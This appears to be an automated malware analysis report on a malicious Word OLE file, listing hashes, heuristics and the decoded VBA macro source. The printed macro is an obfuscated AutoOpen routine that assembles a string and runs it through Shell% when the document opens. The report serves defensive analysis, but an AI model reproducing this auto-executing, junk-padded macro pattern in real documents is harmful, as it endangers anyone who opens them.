Office (OLE) malware analysis — malicious · c925ac3b2c8d3abd

MALICIOUS

Office (OLE)

131.3 KB First seen: 2019-05-16

MD5: 6950a0540d8dab678ac1ce66e1119ec3 SHA-1: b039b1f2a0fdd54a613a3249f1e1b8d8231a5abb SHA-256: c925ac3b2c8d3abd7b5d21b559d5d7ec31b435f095cd7c04ab70ec0c3b3da4ef

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is an OLE document containing a legacy WordBasic AutoOpen macro. The macro is heavily obfuscated and truncated, making it difficult to determine its exact functionality, but the presence of AutoOpen and the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic indicate an attempt to automatically execute malicious code upon opening. The large slack space in the OLE structure is also suspicious.

Heuristics 5

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 134,442 bytes but its declared streams total only 36,399 bytes — 98,043 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4029 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4029 bytes
SHA-256: `d36fea1deb2d51557e4a287c55f373c1fc76085af243242a6830547a9f40c3df`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wstfmJw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim LkaHhw(2) LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY) LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz) Dim FLWsC(1) FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt) Dim tFOPFu(1) tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV) toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI) Dim rzMSYv(2) rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr) rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453) End Sub Attribute VB_Name = "fISDYwijcME" Function toiMFARcmp(LKcIQq As String) Const dophVu = 0 Dim irPnV(1) irPnV(0) = InStrRev(LAjcO + ifmZmMVCHXNRzIsunpLunsX + tNrjNShi, ZWjbQHP + IDIXjUpSkzjOPXIozwSaj + XENvmX) + InStrRev(otlqLPXT + JGKHLTCsIiqdYzIlXwcvYb + XDZcfD, TMQsust + GzQNsCShqwhKmjfoBfDnzz + jtrfEjTR) + InStr(KiBGqz + tIakKwNuwDKQGmsqLu + UCUlBnvo, VEVVwit + mWOTwuQuwHBksRqMLRzHw + KskqKwsu) + Left(FiYrls + zYlMEPNsGhnORkAKioKIp + BARVaZYR, 956) Dim nQXYTJ(2) nQXYTJ(0) = InStr(tDHAc + NSViiQAavWIwJuotABAY + FbmEKDv, TKrarcnY + wBDuwPuiBiMunDZoPsbNA + wnURNdE) + InStrRev(ZBjopQO + UGQEWSnZhjUnDFNURnAI + dXHZz, OTfiTsR + otWMQmwaWKuvGTCsvfAk + GTXWt) + Left(SnzHlllr + wcnjSNMBpYGwnJJSaFj + cIGMMj, 324) + Right(zBHvWo + lskRLLzwibYwaSGJHAXU + kwmBsk, 411) nQXYTJ(1) = Left(ToMDQT + OCpcXZccPizKOubrZv + GMjGdSPq, 815) + InStr(ISktNYD + UqMFFQJpbVTiQnSF + ZomYF, AOSWWoZ + iBMRGAOrzLBdZFDvCajz + IbJzzUi) + InStr(JRtsGY + FFtZXoNYliNZzqwZFs + ciNPoEX, cjbtTB + variEFrPsCIwjaQrJ + UhoHkt) + Right(hoNnJ + wYcWDZLoXHisTaNXFJ + UwqHLNvL, 217) Shell% LKcIQq, dophVu Dim DkqiFO(2) DkqiFO(0) = InStr(DaGhw + qslqqEjjwNDfZCbMuwnL + qWVrqEfC, HrczDzEH + LWjSpEGkJCjKAAptshAvi + ZdJuujZi) + InStrRev(mCBlwv + rajcziQNtLKbEfcaSPWHc + ifnHulL, CMzjadfT + UshNGGUWLVSEAlbGwZ + Rmihv) DkqiFO(1) = InStrRev(kDbFAoAS + YRpJSIpQZsDMVlPbXYZU + SqwHbzS, aIJzz + sfawhqviCkrJwIiztJio + IHGqLo) + Left(zjutjt + rcYObldbBPzIQAXYioRSO + MvEDYo, 456) + Left(FQLzWi + KYRQjXEMVtGaJJuhXHdab + DapZCEJm, 168) + InStrRev(BjYzK + irrwGQzwHWhzpGdDmSpz + TrHtJ, RHzSHHUY + HBPbsvwEVGZtCvmZjEn + QpsnZM) Dim nVcRPm(1) nVcRPm(0) = Left(GnzXGNi + pQwiHNaMfIOZqmjoB + WcCpNCtO, 254) + Right(PIuNPfH + DGEMJTYhdtufutSzLhzSR + LicXEhn, 608) + InStrRev(XpjudM + zhjOBujHCJFnnItEwZMH + dwqlF, DiUFww + nqZkVlcPEmjIzKjKXzsc + pCESUc) + InStrRev(VJjnWi + LajTwFYjfPluOXQ + XRubbTn, zDFsVlR + WdzjipNKjOUPGitjEsfY + mcKtkzdS) End Function

SHA-256: d36fea1deb2d51557e4a287c55f373c1fc76085af243242a6830547a9f40c3df

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wstfmJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim LkaHhw(2)
LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY)
LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz)
   Dim FLWsC(1)
FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt)
   Dim tFOPFu(1)
tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV)
toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI)
   Dim rzMSYv(2)
rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr)
rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453)
End Sub


Attribute VB_Name = "fISDYwijcME"
Function toiMFARcmp(LKcIQq As String)
Const dophVu = 0
   Dim irPnV(1)
irPnV(0) = InStrRev(LAjcO + ifmZmMVCHXNRzIsunpLunsX + tNrjNShi, ZWjbQHP + IDIXjUpSkzjOPXIozwSaj + XENvmX) + InStrRev(otlqLPXT + JGKHLTCsIiqdYzIlXwcvYb + XDZcfD, TMQsust + GzQNsCShqwhKmjfoBfDnzz + jtrfEjTR) + InStr(KiBGqz + tIakKwNuwDKQGmsqLu + UCUlBnvo, VEVVwit + mWOTwuQuwHBksRqMLRzHw + KskqKwsu) + Left(FiYrls + zYlMEPNsGhnORkAKioKIp + BARVaZYR, 956)
   Dim nQXYTJ(2)
nQXYTJ(0) = InStr(tDHAc + NSViiQAavWIwJuotABAY + FbmEKDv, TKrarcnY + wBDuwPuiBiMunDZoPsbNA + wnURNdE) + InStrRev(ZBjopQO + UGQEWSnZhjUnDFNURnAI + dXHZz, OTfiTsR + otWMQmwaWKuvGTCsvfAk + GTXWt) + Left(SnzHlllr + wcnjSNMBpYGwnJJSaFj + cIGMMj, 324) + Right(zBHvWo + lskRLLzwibYwaSGJHAXU + kwmBsk, 411)
nQXYTJ(1) = Left(ToMDQT + OCpcXZccPizKOubrZv + GMjGdSPq, 815) + InStr(ISktNYD + UqMFFQJpbVTiQnSF + ZomYF, AOSWWoZ + iBMRGAOrzLBdZFDvCajz + IbJzzUi) + InStr(JRtsGY + FFtZXoNYliNZzqwZFs + ciNPoEX, cjbtTB + variEFrPsCIwjaQrJ + UhoHkt) + Right(hoNnJ + wYcWDZLoXHisTaNXFJ + UwqHLNvL, 217)
Shell% LKcIQq, dophVu
   Dim DkqiFO(2)
DkqiFO(0) = InStr(DaGhw + qslqqEjjwNDfZCbMuwnL + qWVrqEfC, HrczDzEH + LWjSpEGkJCjKAAptshAvi + ZdJuujZi) + InStrRev(mCBlwv + rajcziQNtLKbEfcaSPWHc + ifnHulL, CMzjadfT + UshNGGUWLVSEAlbGwZ + Rmihv)
DkqiFO(1) = InStrRev(kDbFAoAS + YRpJSIpQZsDMVlPbXYZU + SqwHbzS, aIJzz + sfawhqviCkrJwIiztJio + IHGqLo) + Left(zjutjt + rcYObldbBPzIQAXYioRSO + MvEDYo, 456) + Left(FQLzWi + KYRQjXEMVtGaJJuhXHdab + DapZCEJm, 168) + InStrRev(BjYzK + irrwGQzwHWhzpGdDmSpz + TrHtJ, RHzSHHUY + HBPbsvwEVGZtCvmZjEn + QpsnZM)
   Dim nVcRPm(1)
nVcRPm(0) = Left(GnzXGNi + pQwiHNaMfIOZqmjoB + WcCpNCtO, 254) + Right(PIuNPfH + DGEMJTYhdtufutSzLhzSR + LicXEhn, 608) + InStrRev(XpjudM + zhjOBujHCJFnnItEwZMH + dwqlF, DiUFww + nqZkVlcPEmjIzKjKXzsc + pCESUc) + InStrRev(VJjnWi + LajTwFYjfPluOXQ + XRubbTn, zDFsVlR + WdzjipNKjOUPGitjEsfY + mcKtkzdS)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.